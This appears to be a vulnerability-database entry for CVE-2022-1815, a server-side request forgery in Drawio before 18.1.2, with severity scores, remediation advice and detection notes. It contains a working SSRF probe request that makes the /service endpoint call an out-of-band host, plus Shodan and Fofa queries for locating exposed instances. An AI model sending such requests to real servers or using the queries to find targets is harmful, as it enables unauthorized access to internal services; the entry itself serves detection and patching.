🔙 목록으로 돌아가기

CVE-2022-1815: Drawio <18.1.2 - Server-Side Request Forgery

TitleDrawio <18.1.2 - Server-Side Request Forgery
Authoramit-jd
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.
RemediationUpgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability.
CVSS Score7.5
EPSS Score0.24873
CVE IDCVE-2022-1815
CWE IDCWE-918,CWE-200
Shodan Queryhttp.title:"flowchart maker"
Fofa Querytitle="flowchart maker"
Tags cve cve2022 huntr drawio ssrf oast oss jgraph diagrams vuln

🔍 Vulnerability Description

Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /service/0/test.oast.me HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/7.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1815.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1815.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A